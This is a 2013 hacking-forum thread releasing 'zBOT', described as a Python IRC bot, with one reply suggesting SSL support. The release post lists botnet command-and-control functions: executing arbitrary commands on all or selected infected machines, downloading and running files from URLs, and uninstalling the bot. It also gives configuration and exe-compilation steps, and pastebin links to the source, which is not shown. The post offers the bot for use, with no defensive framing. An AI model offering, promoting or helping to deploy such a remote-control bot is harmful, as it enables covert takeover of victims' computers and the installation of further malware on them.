Author Topic: [Release] zBOT IRC Bot  (Read 1017 times)

0 Members and 1 Guest are viewing this topic.

Offline harvey

  • /dev/null
  • *
  • Posts: 8
  • Cookies: -3
    • View Profile
[Release] zBOT IRC Bot
« on: September 28, 2013, 09:58:08 am »
zBOT IRC BOT
--------------------------------------------------
A python IRC bot skeleton, very stable and clean.

INFORMATION
This bot is very stable, small and clean. It has a few simple commands listed below.

COMMANDS
Code: [Select]
- .cmd all [CMD] Execute [CMD] on all machines,
- .cmd [KEY] [CMD] Execute [CMD] on [KEY] machine.
- .dl all [URL] Download [URL] and execute file,
- .dl [KEY] [URL] Download [URL] and execute a file on [KEY] machine.
- .info Information about the bot.
- .kill [KEY] Uninstall the bot on [KEY] machine.
- .nuke Uninstall the bot.

USAGE
Edit the "zbot.py" file and edit your config. The following is in the config :
Code: [Select]
- ircs: IRC Server.
- ircp: IRC Port.
- ircc: IRC Channel.
- ircs_backup: Backup IRC Server.
- ircp_backup: Backup IRC Port.
- ircc_backup: Backup IRC Channel.
- version: zBot Version.

You can use "setup.py" to compile the bot into an exe file, but you must download and install Py2EXE. The bin is under 2MB!

SOURCE CODE
- zbot.py: http://pastebin.com/kbstVXXC

- setup.py: http://pastebin.com/zEcjRvWm
« Last Edit: September 28, 2013, 05:29:24 pm by Kulverstukas »

Offline nattewasbeer

  • /dev/null
  • *
  • Posts: 5
  • Cookies: 1
  • h4xh4x
    • View Profile
Re: [Release] zBOT IRC Bot
« Reply #1 on: September 30, 2013, 11:20:20 pm »
Might as well code in SSL support while you're at it.
~~~~~